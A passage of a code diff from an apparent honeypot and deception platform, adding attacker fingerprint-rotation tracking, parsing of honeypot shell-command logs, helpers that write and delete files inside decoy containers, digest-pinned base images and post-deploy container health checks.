+
+
+@dataclass
+class RotationOutcome:
+    """Return shape of :func:`record_fingerprint`.  Caller usually
+    ignores it; useful for tests + tracing."""
+    kind: RotationKind
+    old_hash: str | None
+    new_hash: str
+    rotation_count: int
+
+
+_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
+
+
+def record_fingerprint(
+    session: Session,
+    *,
+    attacker_ip: str,
+    port: int,
+    probe_type: ProbeType,
+    new_hash: str,
+    ts: datetime,
+    publish_fn: PublishFn | None = None,
+    syslog_fn: SyslogFn | None = None,
+) -> RotationOutcome:
+    """Upsert state row; on hash diff, emit derived event + stamp.
+
+    Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
+    Attacker table.  If no Attacker row exists yet (the prober raced
+    ahead of the correlator), returns ``kind="no_attacker_row"`` and
+    does nothing — the next probe cycle will pick it up once the
+    correlator has caught up.
+
+    State upsert + Attacker stamp + publish + syslog are committed in
+    one transaction so a partial failure can't desync state from
+    what was emitted.
+    """
+    attacker = session.exec(
+        select(Attacker).where(Attacker.ip == attacker_ip)
+    ).first()
+    if attacker is None:
+        return RotationOutcome(
+            kind="no_attacker_row",
+            old_hash=None,
+            new_hash=new_hash,
+            rotation_count=0,
+        )
+
+    row = session.exec(
+        select(AttackerFingerprintState).where(
+            AttackerFingerprintState.attacker_uuid == attacker.uuid,
+            AttackerFingerprintState.port == port,
+            AttackerFingerprintState.probe_type == probe_type,
+        )
+    ).first()
+
+    if row is None:
+        session.add(AttackerFingerprintState(
+            uuid=str(_uuid.uuid4()),
+            attacker_uuid=attacker.uuid,
+            port=port,
+            probe_type=probe_type,
+            last_hash=new_hash,
+            last_seen=ts,
+            rotation_count=0,
+        ))
+        session.commit()
+        return RotationOutcome(
+            kind="first_sighting",
+            old_hash=None,
+            new_hash=new_hash,
+            rotation_count=0,
+        )
+
+    if row.last_hash == new_hash:
+        row.last_seen = ts
+        session.add(row)
+        session.commit()
+        return RotationOutcome(
+            kind="unchanged",
+            old_hash=row.last_hash,
+            new_hash=new_hash,
+            rotation_count=row.rotation_count,
+        )
+
+    old_hash = row.last_hash
+    row.last_hash = new_hash
+    row.last_seen = ts
+    row.rotation_count += 1
+    session.add(row)
+
+    attacker.rotation_count += 1
+    attacker.last_rotation_at = ts
+    session.add(attacker)
+
+    payload: dict[str, Any] = {
+        "attacker_uuid": attacker.uuid,
+        "attacker_ip": attacker_ip,
+        "port": port,
+        "probe_type": probe_type,
+        "old_hash": old_hash,
+        "new_hash": new_hash,
+        "rotation_count": row.rotation_count,
+        "ts": ts.isoformat(),
+    }
+
+    if publish_fn is not None:
+        publish_fn(_ROTATED_EVENT_TYPE, payload)
+    if syslog_fn is not None:
+        syslog_fn(_ROTATED_EVENT_TYPE, payload)
+
+    session.commit()
+
+    return RotationOutcome(
+        kind="rotated",
+        old_hash=old_hash,
+        new_hash=new_hash,
+        rotation_count=row.rotation_count,
+    )
--- a/decnet/correlation/parser.py
+++ b/decnet/correlation/parser.py
@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
    r"(.+)$",       # 5: SD element + optional MSG
 )

+# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
+# Docker-stdout collector envelope wraps the inner ``logger
+# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
+# real MSGID lives in the body. Mirrors the unwrap logic in
+# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
+# read the same on-wire format.
+_INNER_RFC5424_RE = re.compile(
+    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
+    r"(\S+)\s+"                       # 2: inner HOSTNAME
+    r"(\S+)\s+"                       # 3: inner APP-NAME
+    r"\S+\s+"                         # PROCID (NIL or PID)
+    r"(\S+)\s+"                       # 4: inner MSGID
+    r"(.+)$",                         # 5: inner SD/MSG remainder
+)
+
 # Structured data block: [relay@55555 k="v" ...]
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)

@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:

    ts_raw, decky, service, event_type, sd_rest = m.groups()

+    # Unwrap double-wrapped Docker-stdout envelopes around bash
+    # PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
+    # logic in ``decnet.collector.worker.parse_rfc5424``. Must run
+    # before the decky/service NIL-guard below — the OUTER decky is
+    # the docker host, the inner header carries the real source.
+    if event_type == "-" and sd_rest.startswith("-"):
+        body = sd_rest[1:].lstrip()
+        inner = _INNER_RFC5424_RE.match(body)
+        if inner is not None:
+            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
+            decky = i_host
+            service = i_app
+            event_type = i_msgid
+            sd_rest = i_rest
+
    if decky == "-" or service == "-":
        return None

@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
        msg = tail.group(1).strip() if tail else ""
    attacker_ip = _extract_attacker_ip(fields, msg)

+    # Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
+    # and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
+    # Without this rewrite they're invisible to the behavioral profiler, which
+    # filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
+    # invocation uses --msgid command, so we must also handle the non-nil case.
+    if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
+        event_type = "command"
+        head, sep, cmd_rest = msg[4:].partition("cmd=")
+        for k, v in re.findall(r'(\w+)=(\S+)', head):
+            fields.setdefault(k, v)
+        if sep:
+            fields.setdefault("command", cmd_rest)
+
    # Mutator-emitted transitions arrive on the same ingest stream but
    # belong in the substrate-state index, not the per-IP attacker one.
    kind: EventKind = (
--- a/decnet/correlation/reuse_worker.py
+++ b/decnet/correlation/reuse_worker.py
@@ -70,7 +70,7 @@ async def run_reuse_loop(
        wake_tasks.append(asyncio.create_task(
            _run_control_listener_signal(bus, "reuse-correlator"),
        ))
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: bus unavailable, running in poll-only mode: %s",
            exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
                results = await engine.correlate_credential_reuse(
                    repo, min_targets=min_targets,
                )
-            except Exception:  # noqa: BLE001
+            except Exception:
                log.exception("reuse correlator: tick failed")
                results = []

@@ -120,11 +120,11 @@ async def run_reuse_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
                wake.set()
    except asyncio.CancelledError:
        raise
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: subscriber for %s died (%s); falling back to poll",
            pattern, exc,
--- a/decnet/decky_io/init.py
+++ b/decnet/decky_io/init.py
@@ -0,0 +1,39 @@
+"""Shared primitives for writing/deleting files inside running deckies.
+
+The canary planter and the orchestrator SSH driver both need to drop
+bytes into a decky container's filesystem, then sometimes unlink them.
+The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
+before this module existed.
+
+Public API:
+
+* :func:`write_file_to_container` — write bytes at a path, set mode,
+  optionally backdate mtime.
+* :func:`delete_file_from_container` — best-effort ``rm -f``.
+* :func:`resolve_topology_container` — pick the right docker container
+  for a MazeNET decky based on its services list.
+* :func:`resolve_decky_container` — async helper that takes
+  ``(decky_name, topology_id?)``, hydrates the topology when needed,
+  and returns the docker container name.
+
+Container resolution conventions are documented in
+:mod:`decnet.topology.compose`; we mirror them here without taking
+a runtime dependency on the compose generator.
+"""
+from __future__ import annotations
+
+from .resolve import (
+    resolve_decky_container,
+    resolve_topology_container,
+)
+from .write import (
+    delete_file_from_container,
+    write_file_to_container,
+)
+
+__all__ = [
+    "delete_file_from_container",
+    "resolve_decky_container",
+    "resolve_topology_container",
+    "write_file_to_container",
+]
--- a/decnet/decky_io/resolve.py
+++ b/decnet/decky_io/resolve.py
@@ -0,0 +1,72 @@
+"""Decky-name → docker container name resolution.
+
+Two scopes:
+
+* **Fleet**: every fleet decky has a ``ssh`` service container named
+  ``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`).  We always
+  target it because it carries the most realistic filesystem layout.
+* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
+  decky exposes the ssh service; otherwise the decky's base container
+  named ``decnet_t_<topology_id8>_<decky_name>`` (matches
+  :func:`decnet.topology.compose._container_name`).
+
+Keeping resolution centralised here means new ``docker exec`` callers
+(file drops, future bulk planters, etc.) never need to learn the
+naming conventions — they just call :func:`resolve_decky_container`.
+"""
+from __future__ import annotations
+
+from typing import Any, Iterable, Optional
+
+_SSH_CONTAINER_SUFFIX = "-ssh"
+
+
+def resolve_topology_container(
+    topology_id: str, decky_name: str, services: Iterable[str],
+) -> str:
+    """Container name for a MazeNET decky.
+
+    See module docstring for the convention.  Pure function — no I/O.
+    """
+    if "ssh" in set(services):
+        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
+    return f"decnet_t_{topology_id[:8]}_{decky_name}"
+
+
+async def resolve_decky_container(
+    repo: Any,
+    decky_name: str,
+    *,
+    topology_id: Optional[str] = None,
+) -> str:
+    """Resolve the docker container name for *decky_name*.
+
+    Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
+    unconditionally.  No DB lookup — the caller is responsible for
+    knowing the decky exists; if it doesn't, the subsequent
+    ``docker exec`` returns a clear error.
+
+    Topology path: hydrates the topology, looks up the decky's services
+    list, delegates to :func:`resolve_topology_container`.
+
+    Raises:
+        LookupError — when ``topology_id`` is set but the topology or
+        its named decky doesn't exist.  Callers translate this into
+        404/422 at the API layer.
+    """
+    if topology_id is None:
+        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
+
+    from decnet.topology.persistence import hydrate
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        raise LookupError(f"topology {topology_id!r} not found")
+    for decky in hydrated["deckies"]:
+        cfg = decky.get("decky_config") or {}
+        name = cfg.get("name") or decky.get("name")
+        if name == decky_name:
+            services = decky.get("services") or []
+            return resolve_topology_container(topology_id, decky_name, services)
+    raise LookupError(
+        f"decky {decky_name!r} is not in topology {topology_id!r}"
+    )
--- a/decnet/decky_io/write.py
+++ b/decnet/decky_io/write.py
@@ -0,0 +1,124 @@
+"""``docker exec``-driven file write/delete inside a decky container.
+
+The write path streams a base64-encoded payload over stdin to
+``base64 -d`` inside the container, so binary content of any size up
+to docker's stream limits is safe — interpolating bytes into argv
+would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
+"""
+from __future__ import annotations
+
+import asyncio
+import base64
+import shlex
+from datetime import datetime, timezone
+from typing import Optional
+
+from decnet.logging import get_logger
+
+log = get_logger("decky_io.write")
+
+_DOCKER = "docker"
+_DEFAULT_TIMEOUT = 8.0
+
+
+def _dirname(path: str) -> str:
+    idx = path.rfind("/")
+    if idx <= 0:
+        return "/"
+    return path[:idx]
+
+
+async def _run(
+    argv: list[str],
+    *,
+    stdin_bytes: Optional[bytes] = None,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[int, str, str]:
+    try:
+        proc = await asyncio.create_subprocess_exec(
+            *argv,
+            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+        )
+    except FileNotFoundError as exc:
+        return 127, "", f"argv[0] not found: {exc}"
+    try:
+        stdout, stderr = await asyncio.wait_for(
+            proc.communicate(input=stdin_bytes), timeout=timeout,
+        )
+    except asyncio.TimeoutError:
+        try:
+            proc.kill()
+        except ProcessLookupError:
+            pass
+        return 124, "", "timeout"
+    return (
+        proc.returncode if proc.returncode is not None else -1,
+        stdout.decode("utf-8", "replace"),
+        stderr.decode("utf-8", "replace"),
+    )
+
+
+async def write_file_to_container(
+    container: str,
+    path: str,
+    content: bytes,
+    *,
+    mode: int = 0o644,
+    mtime: Optional[datetime] = None,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[bool, Optional[str]]:
+    """Write *content* to *path* inside *container* via ``docker exec``.
+
+    The directory above *path* is created if missing; *mode* is applied
+    after the write; when *mtime* is provided the file is backdated via
+    ``touch -d`` (UTC ISO 8601).
+
+    Returns ``(success, error_or_none)``.  ``error`` is the trimmed
+    docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
+    """
+    if not path:
+        return False, "empty path"
+
+    encoded = base64.b64encode(content)
+    parts = [
+        f"mkdir -p {shlex.quote(_dirname(path))}",
+        f"base64 -d > {shlex.quote(path)}",
+        f"chmod {mode:o} {shlex.quote(path)}",
+    ]
+    if mtime is not None:
+        ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
+        parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
+    sh_cmd = " && ".join(parts)
+    argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
+    rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
+    success = rc == 0
+    if success:
+        return True, None
+    err = stderr.strip()[:256] or f"rc={rc}"
+    log.warning(
+        "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
+        container, path, rc, stderr[:120],
+    )
+    return False, err
+
+
+async def delete_file_from_container(
+    container: str,
+    path: str,
+    *,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[bool, Optional[str]]:
+    """Best-effort ``rm -f`` of *path* inside *container*.
+
+    Returns ``(success, error_or_none)``.  ``rm -f`` returns rc=0 even
+    when the file is already gone, so a True result here means "the
+    file is not present after this call", regardless of who unlinked it.
+    """
+    sh_cmd = f"rm -f {shlex.quote(path)}"
+    argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
+    rc, _stdout, stderr = await _run(argv, timeout=timeout)
+    if rc == 0:
+        return True, None
+    return False, stderr.strip()[:256] or f"rc={rc}"
--- a/decnet/distros.py
+++ b/decnet/distros.py
@@ -18,69 +18,86 @@ class DistroProfile:
    build_base: str     # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})


+# Base images are pinned by digest (sha256) to make `docker pull`
+# reproducible — a registry-side rebuild of "debian:bookworm-slim"
+# can't silently swap content under us.  The :tag is kept for human
+# readability; the @sha256 is what Docker actually resolves.
+# Refresh procedure: `docker pull <tag>` then `docker inspect
+# --format '{{index .RepoDigests 0}}' <tag>`.  Last refreshed 2026-05-03.
+_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
+_UBUNTU_22_04    = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
+_UBUNTU_20_04    = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
+_ROCKY_9         = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
+_CENTOS_7        = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
+_ALPINE_3_19     = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
+_FEDORA_39       = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
+_KALI_ROLLING    = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
+_ARCH_LATEST     = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
+
+
 DISTROS: dict[str, DistroProfile] = {
    "debian": DistroProfile(
        slug="debian",
-        image="debian:bookworm-slim",
+        image=_DEBIAN_BOOKWORM,
        display_name="Debian 12 (Bookworm)",
        hostname_style="generic",
-        build_base="debian:bookworm-slim",
+        build_base=_DEBIAN_BOOKWORM,
    ),
    "ubuntu22": DistroProfile(
        slug="ubuntu22",
-        image="ubuntu:22.04",
+        image=_UBUNTU_22_04,
        display_name="Ubuntu 22.04 LTS (Jammy)",
        hostname_style="generic",
-        build_base="ubuntu:22.04",
+        build_base=_UBUNTU_22_04,
    ),
    "ubuntu20": DistroProfile(
        slug="ubuntu20",
-        image="ubuntu:20.04",
+        image=_UBUNTU_20_04,
        display_name="Ubuntu 20.04 LTS (Focal)",
        hostname_style="generic",
-        build_base="ubuntu:20.04",
+        build_base=_UBUNTU_20_04,
    ),
    "rocky9": DistroProfile(
        slug="rocky9",
-        image="rockylinux:9-minimal",
+        image=_ROCKY_9,
        display_name="Rocky Linux 9",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "centos7": DistroProfile(
        slug="centos7",
-        image="centos:7",
+        image=_CENTOS_7,
        display_name="CentOS 7",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "alpine": DistroProfile(
        slug="alpine",
-        image="alpine:3.19",
+        image=_ALPINE_3_19,
        display_name="Alpine Linux 3.19",
        hostname_style="minimal",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "fedora": DistroProfile(
        slug="fedora",
-        image="fedora:39",
+        image=_FEDORA_39,
        display_name="Fedora 39",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "kali": DistroProfile(
        slug="kali",
-        image="kalilinux/kali-rolling",
+        image=_KALI_ROLLING,
        display_name="Kali Linux (Rolling)",
        hostname_style="rolling",
-        build_base="kalilinux/kali-rolling",  # Debian-based, apt-get compatible
+        build_base=_KALI_ROLLING,  # Debian-based, apt-get compatible
    ),
    "arch": DistroProfile(
        slug="arch",
-        image="archlinux:latest",
+        image=_ARCH_LATEST,
        display_name="Arch Linux",
        hostname_style="rolling",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
 }

--- a/decnet/engine/deployer.py
+++ b/decnet/engine/deployer.py
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
 """

 import asyncio
+import json
 import shutil
 import subprocess  # nosec B404
 import time
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
 _AUTH_HELPER_SERVICES = {"ssh", "telnet"}
 _CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
 _NTLMSSP_SERVICES = {"smb", "rdp"}
+_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
+_CADDY_SERVICES = {"http", "https"}


 def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
                    shutil.copy2(src, dest)


+def _chown_tree(dest: Path, owner_ref: Path) -> None:
+    """Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
+    import os
+    if os.geteuid() != 0:
+        return
+    st = owner_ref.stat()
+    uid, gid = st.st_uid, st.st_gid
+    targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
+    for p in targets:
+        try:
+            os.lchown(p, uid, gid)
+        except OSError:
+            pass
+
+
+def _sync_caddy_modules(config: DecnetConfig) -> None:
+    """Mirror _caddy_modules/ into http/https build contexts.
+
+    The xcaddy builder stage in each Dockerfile references
+    ``_caddy_modules/decnetfp`` relative to its build context (the
+    per-service template dir). Since the canonical source lives one
+    level up at ``templates/_caddy_modules/``, we sync it into each
+    active http/https build context before compose up, mirroring the
+    sessrec / auth-helper patterns.
+    """
+    from decnet.services.registry import get_service
+    src_dir = _CANONICAL_CADDY_MODULES_DIR
+    if not src_dir.is_dir():
+        return
+    seen: set[Path] = set()
+    for decky in config.deckies:
+        for svc_name in decky.services:
+            if svc_name not in _CADDY_SERVICES:
+                continue
+            svc = get_service(svc_name)
+            if svc is None:
+                continue
+            ctx = svc.dockerfile_context()
+            if ctx is None or ctx in seen:
+                continue
+            seen.add(ctx)
+            dest_dir = ctx / "_caddy_modules"
+            dest_dir.mkdir(exist_ok=True)
+            for child in src_dir.iterdir():
+                dest_child = dest_dir / child.name
+                if child.is_dir():
+                    if dest_child.exists():
+                        shutil.rmtree(dest_child)
+                    shutil.copytree(child, dest_child)
+                    _chown_tree(dest_child, src_dir)
+                else:
+                    if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
+                        shutil.copy2(child, dest_child)
+                        _chown_tree(dest_child, src_dir)
+
+
+def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
+    """Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
+
+    Used for post-deploy verification: ``compose up -d`` returns 0 the
+    moment containers are *started*, but a service that crashes on boot
+    (port collision, bad image, missing dependency) only shows up here.
+    Returns an empty list when compose has nothing to report (and on
+    parse failure — caller treats that as 'unverifiable, don't gate').
+    """
+    cmd = [
+        "docker", "compose", "-p", "decnet", "-f", str(compose_file),
+        "ps", "--all", "--format", "json",
+    ]
+    try:
+        result = subprocess.run(  # nosec B603
+            cmd, capture_output=True, text=True, check=False,
+        )
+    except FileNotFoundError:
+        return []
+    if result.returncode != 0:
+        return []
+    rows: list[dict[str, object]] = []
+    # ``docker compose ps --format json`` emits one JSON object per line
+    # (newline-delimited), not a JSON array.  Parse line-by-line so a
+    # single bad line doesn't poison the whole result.
+    for line in (result.stdout or "").splitlines():
+        line = line.strip()
+        if not line:
+            continue
+        try:
+            obj = json.loads(line)
+        except json.JSONDecodeError:
+            continue
+        if isinstance(obj, dict):
+            rows.append(obj)
+        elif isinstance(obj, list):
+            for item in obj:
+                if isinstance(item, dict):
+                    rows.append(item)
+    return rows
+
+
 def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
    import os
    # -p decnet pins the compose project name. Without it, docker compose
@@ -393,6 +494,8 @@ def _compose_with_retry(
                console.print(f"[red]{result.stderr.strip()}[/]")
                log.error("docker compose %s failed after %d attempts: %s",
                          " ".join(args), retries, result.stderr.strip())
+    if last_exc is None:  # pragma: no cover — retries=0 is not a supported call
+        raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
    raise last_exc


@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
    _sync_sessrec_sources(config)
    _sync_auth_helper_sources(config)
    _sync_ntlmssp_sources(config)
+    _sync_caddy_modules(config)

    compose_path = write_compose(config, COMPOSE_FILE)
    console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
        )
        raise

-    await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
-    log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
+    # Post-deploy verification: ``compose up -d`` returns 0 the moment
+    # containers are *started*, so a service that crashes on boot
+    # (port bind failure, bad image, missing dependency) leaves the
+    # topology row sitting at ACTIVE while half the substrate is dead.
+    # Sample compose ps once and downgrade to DEGRADED if any expected
+    # container isn't running — operators see real state instead of an
+    # optimistic flag.
+    ps_rows = await anyio.to_thread.run_sync(
+        lambda: _compose_ps(compose_path),
+    )
+    bad: list[str] = []
+    # Build the per-decky state map.  The base container's compose
+    # service name == decky name, which is what we cache on the
+    # TopologyDecky row.  Service containers (named ``<decky>-<svc>``)
+    # don't gate the decky's state — service-level failures are visible
+    # in compose ps separately and don't downgrade the decky as a whole.
+    decky_state_by_name: dict[str, str] = {}
+    for row in ps_rows:
+        state = str(row.get("State", "")).lower()
+        service_name = str(row.get("Service") or "")
+        if service_name and "-" not in service_name:
+            # Plain decky base; cache its docker state.
+            decky_state_by_name[service_name] = state or "unknown"
+        if state and state != "running":
+            name = str(row.get("Name") or row.get("Service") or "?")
+            exit_code = row.get("ExitCode")
+            bad.append(
+                f"{name}={state}"
+                + (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
+            )
+
+    # Reconcile each TopologyDecky.state from compose's view.  Without
+    # this, the row stays at the default 'pending' forever and the
+    # dashboard's ACTIVE DECKIES count reads 0/N even when everything's
+    # actually up.
+    for decky in hydrated["deckies"]:
+        cfg = decky.get("decky_config") or {}
+        decky_name = cfg.get("name") or decky.get("name")
+        if not decky_name:
+            continue
+        ds = decky_state_by_name.get(decky_name, "unknown")
+        new_state = "running" if ds == "running" else "failed"
+        try:
+            await repo.update_topology_decky(
+                decky["uuid"], {"state": new_state},
+            )
+        except Exception as exc:  # noqa: BLE001
+            log.warning(
+                "post-deploy state reconcile failed topology=%s decky=%s: %s",
+                topology_id, decky_name, exc,
+            )
+
+    if bad:
+        reason = "post-deploy check: " + ", ".join(bad[:8]) + (
+            f" and {len(bad) - 8} more" if len(bad) > 8 else ""
+        )
+        await transition_status(
+            repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
+        )
+        log.warning(
+            "topology %s deployed but %d container(s) unhealthy: %s",
+            topology_id, len(bad), reason,
+        )
+    else:
+        await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
+        log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
+
+    # Best-effort canary baseline seed across every decky in the
+    # topology.  Same resilience contract as the fleet path: failures
+    # surface as state=failed token rows, never abort the deploy.
+    try:
+        from decnet.canary import planter as _canary_planter
+        await _canary_planter.seed_baseline_topology(repo, topology_id)
+    except Exception as exc:  # noqa: BLE001
+        log.warning(
+            "canary baseline seed failed (best-effort) topology=%s err=%s",
+            topology_id, exc,
+        )


@_traced("engine.teardown_topology")
--- a/decnet/engine/services_live.py
+++ b/decnet/engine/services_live.py
@@ -0,0 +1,673 @@
+"""Add/remove a single service on a deployed decky without full redeploy.
+
+The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
+supports per-service targeting (``up --no-deps -d <svc>``,
+``stop <svc>``, ``rm -f <svc>``).  What was missing was the
+orchestration: regenerate the compose file (so future redeploys reflect
+the change), persist the new ``services`` list, and run the targeted
+compose command.
+
+Two scopes:
+
+* **Topology** — source of truth is the ``topology_deckies`` table; the
+  compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
+* **Fleet** — source of truth is ``decnet-state.json`` (with the
+  ``fleet_deckies`` table mirroring it); compose is the unihost
+  ``decnet-compose.yml``.
+
+Both publish ``decky.<name>.service.added`` /
+``decky.<name>.service.removed`` on the bus.  The new topic constants
+are documented in ``wiki-checkout/Service-Bus.md``.
+"""
+from __future__ import annotations
+
+import subprocess  # nosec B404
+from pathlib import Path
+from typing import Any, Literal, Optional
+
+import anyio
+
+from decnet.bus import topics
+from decnet.logging import get_logger
+from decnet.services.base import BaseService
+from decnet.services.registry import get_service
+from decnet.topology.persistence import hydrate
+from decnet.web.db.repository import BaseRepository
+
+# Heavy imports (composer/deployer pull in decnet.network → docker) are
+# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
+# / ``_load_state`` indirection helpers below.  Mirrors the lazy-import
+# pattern in decnet.canary.planter for the same reason.
+
+
+def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
+    """Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
+
+    Real implementation lives in :mod:`decnet.engine.deployer`; we
+    import-and-delegate at call time to keep this module's import graph
+    clean (see module docstring above).
+    """
+    from decnet.engine.deployer import _compose as _real_compose
+    if compose_file is None:
+        _real_compose(*args, env=env)
+    else:
+        _real_compose(*args, compose_file=compose_file, env=env)
+
+
+def _topology_compose_path(topology_id: str) -> Path:
+    from decnet.engine.deployer import _topology_compose_path as _real_path
+    return _real_path(topology_id)
+
+
+def _write_topology_compose(hydrated, path: Path) -> Path:
+    from decnet.topology.compose import write_topology_compose
+    return write_topology_compose(hydrated, path)
+
+
+def _load_state():
+    from decnet.config import load_state as _real_load_state
+    return _real_load_state()
+
+
+def _save_state(config, compose_path) -> None:
+    from decnet.config import save_state as _real_save_state
+    _real_save_state(config, compose_path)
+
+
+def _write_compose(config, compose_path) -> None:
+    from decnet.composer import write_compose as _real_write_compose
+    _real_write_compose(config, compose_path)
+
+
+def _get_bus():
+    from decnet.bus.factory import get_bus
+    return get_bus()
+
+
+# --------------------------- swarm propagation helpers ---------------------------
+#
+# Service mutations (add/remove/update_config) on a deployed decky used to run
+# the master's local docker-compose only.  For swarm fleet deckies the master
+# has no containers; for agent-targeted topologies the master only writes a
+# compose file the worker never sees.  These helpers replay the change to the
+# worker so the env actually lands.
+#
+# Lazy imports keep this module's import graph clean (composer/swarm pull in
+# decnet.network → docker, mirroring the pattern used elsewhere in this file).
+
+
+async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
+    """Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
+    shards = await repo.list_decky_shards()
+    for s in shards:
+        if s.get("decky_name") == decky_name:
+            return s.get("host_uuid")
+    return None
+
+
+async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
